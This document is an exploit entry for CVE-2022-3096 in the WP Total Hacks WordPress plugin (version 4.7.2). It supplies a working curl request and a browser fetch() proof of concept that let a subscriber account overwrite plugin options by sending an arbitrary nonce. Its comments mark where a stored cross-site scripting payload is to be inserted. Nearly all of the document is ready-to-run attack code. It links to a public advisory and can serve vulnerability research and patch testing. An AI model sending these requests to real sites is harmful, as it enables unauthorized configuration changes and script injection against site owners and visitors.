CVE: CVE-2022-3096
Name: WP Total Hacks (wp-total-hacks)
Version: 4.7.2
Date: 2022-04-01 19:56:10
Advisory: https://wpscan.com/vulnerability/46996537-a874-4b2e-9cd7-7d0832f9704d
Type: Authenticated Options Update, Stored XSS, CSRF
Exploit:
Log in as a subscriber (the lowest default WordPress role) and send the request below. The plugin performs no permission or capability check on the options update, does not verify the `wpbiz-nonce` value (an arbitrary string such as `aaa` is accepted, which is the same missing check that enables the CSRF variant), and applies no further sanitization to the submitted option values.
Also allows Stored XSS: the submitted option values are persisted without sanitization, so the placeholder values in the request (`wfb_google_analytics=wwwww`, `wfb_google=ttttt`) can be replaced with a script payload. Which stored option is later rendered unescaped is not shown here; confirm against the plugin's output before relying on a specific field.
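# PoC: authenticated (subscriber) options update against WP Total Hacks.
# - Replace the Cookie value with a valid WordPress session cookie for a
#   low-privileged (subscriber) account on the target; nothing else is needed.
# - "wpbiz-nonce=aaa" is deliberately arbitrary: the plugin does not verify it.
# - The option values are stored unsanitized; the placeholders
#   wfb_google_analytics=wwwww / wfb_google=ttttt are where a Stored XSS
#   payload would be placed (URL-encode it for the form body).
# - The original listing lacked line continuations, so each "-H" line ran as
#   its own shell command; the manual "Accept-Encoding: gzip, deflate" header
#   is replaced by --compressed so curl actually decodes the response instead
#   of dumping raw gzip. -X POST is implied by --data-raw. The Sec-Fetch-*
#   values are aligned with the fetch() variant (a top-level form navigation).
curl "https://example.com/wp-admin/" \
  --compressed \
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" \
  -H "Accept-Language: de,en;q=0.7,en-US;q=0.3" \
  -H "Referer: https://example.com/wp-admin/" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "Origin: https://example.com" \
  -H "DNT: 1" \
  -H "Connection: keep-alive" \
  -H "Cookie: wordpress_..." \
  -H "Sec-Fetch-Dest: document" \
  -H "Sec-Fetch-Mode: navigate" \
  -H "Sec-Fetch-Site: same-origin" \
  -H "Sec-Fetch-User: ?1" \
  --data-raw "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern"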
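// PoC: same request issued from the browser devtools console while logged in
// as a subscriber on the target site; "credentials: include" attaches the
// session cookie, so no Cookie header is needed.
//
// Fixes relative to the original listing:
// - The body string literal was split across two lines, which is a syntax
//   error in JavaScript; the form is now built with URLSearchParams, whose
//   serialization matches the original bytes (space -> "+", "Ä" -> "%C3%84").
// - User-Agent and Sec-Fetch-* are forbidden header names for fetch() and are
//   silently dropped by the browser, so they are omitted rather than implied.
const form = new URLSearchParams({
  "wpbiz-nonce": "aaa", // arbitrary: the plugin does not verify the nonce
  "tabid": "total-hacks-admin",
  "wfb_favicon": "",
  "wfb_admin_favicon": "",
  "wfb_apple_icon": "",
  "wfb_remove_xmlrpc": "",
  "wfb_hide_version": "",
  "wfb_remove_more": "",
  "wfb_remove_excerpt": "",
  "wfb_disallow_pingback": "",
  // Placeholder values: options are stored unsanitized, so a Stored XSS
  // payload goes here (confirm which option is rendered unescaped).
  "wfb_google_analytics": "wwwww",
  "wfb_google": "ttttt",
  "wfb_bing": "",
  "wfb_revision": "",
  "wfb_selfping": "",
  "wfb_pageexcerpt": "",
  "wfb_createpagefordraft": "",
  "wfb_custom_logo": "",
  "wfb_admin_footer_text": "",
  "wfb_login_logo": "",
  "wfb_login_url": "",
  "wfb_login_title": "",
  "wfb_shortcode": "",
  "wfb_oembed": "",
  "wfb_webmaster": "",
  "wfb_sendername": "",
  "wfb_emailaddress": "",
  "wfb_update_notification": "",
  "submit": "Änderungen speichern", // serializes as %C3%84nderungen+speichern
});

await fetch("https://example.com/wp-admin/", {
  credentials: "include",
  headers: {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en;q=0.7,en-US;q=0.3",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
  },
  referrer: "https://example.com/wp-admin/",
  body: form.toString(),
  method: "POST",
  mode: "cors",
});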